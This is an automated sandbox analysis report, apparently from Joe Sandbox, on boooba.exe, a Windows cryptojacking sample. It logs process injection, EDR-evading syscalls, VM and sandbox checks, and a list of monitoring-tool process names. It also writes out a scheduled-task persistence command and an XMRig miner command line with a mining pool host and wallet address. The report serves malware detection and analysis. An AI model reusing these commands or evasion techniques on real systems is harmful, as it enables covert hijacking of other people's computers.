              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\System32\nslookup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\System32\nslookup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: nslookup.exe, 0000000D.00000002.2902391217.0000019A4A588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\boooba.exeMemory allocated: C:\Windows\System32\conhost.exe base: 15759250000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\IOAshdohSha.exeMemory allocated: C:\Windows\System32\conhost.exe base: 13CA14E0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\IOAshdohSha.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1E311770000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 29965300000 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\boooba.exeThread created: C:\Windows\System32\conhost.exe EIP: 59250000Jump to behavior
              Source: C:\Users\user\IOAshdohSha.exeThread created: C:\Windows\System32\conhost.exe EIP: A14E0000Jump to behavior
              Source: C:\Users\user\IOAshdohSha.exeThread created: C:\Windows\System32\conhost.exe EIP: 11770000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeThread created: C:\Windows\System32\conhost.exe EIP: 65300000Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtCreateThreadEx: Direct from: 0x401A17Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtWriteVirtualMemory: Direct from: 0x401D57Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtProtectVirtualMemory: Direct from: 0x401DD7Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtClose: Direct from: 0x401CD7
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtAllocateVirtualMemory: Direct from: 0x401D97Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5AJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\System32\conhost.exeThread register set: target process: 6288Jump to behavior
              Source: C:\Windows\System32\conhost.exeThread register set: target process: 5480Jump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\boooba.exeMemory written: C:\Windows\System32\conhost.exe base: 15759250000Jump to behavior
              Source: C:\Users\user\IOAshdohSha.exeMemory written: C:\Windows\System32\conhost.exe base: 13CA14E0000Jump to behavior
              Source: C:\Users\user\IOAshdohSha.exeMemory written: C:\Windows\System32\conhost.exe base: 1E311770000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140001000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140367000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 1404A0000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140753000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140775000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140776000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140777000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140779000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 14077B000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 14077C000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 14077D000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 59CFC77010Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 29965300000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140001000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140367000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 1404A0000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140753000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140775000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140776000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140777000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 140779000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 14077B000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 14077C000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 14077D000Jump to behavior
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\nslookup.exe base: 26087A5010Jump to behavior
              Source: C:\Users\user\Desktop\boooba.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Users\user\IOAshdohSha.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exeJump to behavior
              Source: C:\Users\user\IOAshdohSha.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\nslookup.exeCode function: 12_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_000000014031010C

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              Windows Service              		1
              Windows Service              		111
              Masquerading              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		511
              Process Injection              		111
              Virtualization/Sandbox Evasion              		LSASS Memory3
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              DLL Side-Loading              		1
              Scheduled Task/Job              		511
              Process Injection              		Security Account Manager111
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Abuse Elevation Control Mechanism              		1
              Abuse Elevation Control Mechanism              		NTDS1
              System Network Configuration Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              DLL Side-Loading              		1
              DLL Side-Loading              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545299 Sample: boooba.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 57 xmr-eu1.nanopool.org 2->57 77 Sigma detected: Xmrig 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus / Scanner detection for submitted sample 2->81 85 7 other signatures 2->85 11 IOAshdohSha.exe 2->11         started        14 boooba.exe 2->14         started        signatures3 83 DNS related to crypt mining pools 57->83 process4 signatures5 107 Antivirus detection for dropped file 11->107 109 Multi AV Scanner detection for dropped file 11->109 111 Machine Learning detection for dropped file 11->111 16 conhost.exe 6 11->16         started        113 Writes to foreign memory regions 14->113 115 Allocates memory in foreign processes 14->115 117 Creates a thread in another existing process (thread injection) 14->117 20 conhost.exe 5 14->20         started        process6 file7 49 C:\Users\user\AppData\...\sihost64.exe, PE32+ 16->49 dropped 51 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 16->51 dropped 61 Found strings related to Crypto-Mining 16->61 63 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->63 65 Uses nslookup.exe to query domains 16->65 69 4 other signatures 16->69 22 sihost64.exe 16->22         started        25 nslookup.exe 16->25         started        53 C:\Users\user\IOAshdohSha.exe, PE32+ 20->53 dropped 55 C:\Users\...\IOAshdohSha.exe:Zone.Identifier, ASCII 20->55 dropped 67 Drops PE files to the user root directory 20->67 27 cmd.exe 1 20->27         started        29 cmd.exe 1 20->29         started        signatures8 process9 signatures10 87 Antivirus detection for dropped file 22->87 89 Multi AV Scanner detection for dropped file 22->89 91 Machine Learning detection for dropped file 22->91 97 4 other signatures 22->97 31 conhost.exe 2 22->31         started        93 Query firmware table information (likely to detect VMs) 25->93 33 IOAshdohSha.exe 27->33         started        36 conhost.exe 27->36         started        95 Uses schtasks.exe or at.exe to add and modify task schedules 29->95 38 conhost.exe 29->38         started        40 schtasks.exe 1 29->40         started        process11 signatures12 71 Writes to foreign memory regions 33->71 73 Allocates memory in foreign processes 33->73 75 Creates a thread in another existing process (thread injection) 33->75 42 conhost.exe 2 33->42         started        process13 signatures14 99 Uses nslookup.exe to query domains 42->99 101 Writes to foreign memory regions 42->101 103 Modifies the context of a thread in another process (thread injection) 42->103 105 Injects a PE file into a foreign processes 42->105 45 nslookup.exe 42->45         started        process15 dnsIp16 59 212.47.253.124, 10300, 49730, 49731 OnlineSASFR France 45->59 119 Query firmware table information (likely to detect VMs) 45->119 121 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 45->121 signatures17 123 Detected Stratum mining protocol 59->123

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              boooba.exe71%ReversingLabsWin64.Trojan.Donut
              boooba.exe100%AviraHEUR/AGEN.1344202
              boooba.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%AviraHEUR/AGEN.1344832
              C:\Users\user\IOAshdohSha.exe100%AviraHEUR/AGEN.1344202
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%Joe Sandbox ML
              C:\Users\user\IOAshdohSha.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys5%ReversingLabs
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe74%ReversingLabsWin64.Trojan.Donut
              C:\Users\user\IOAshdohSha.exe71%ReversingLabsWin64.Trojan.Donut

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr-eu1.nanopool.org
              		51.15.58.224
              		truetrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://xmrig.com/benchmark/%sconhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
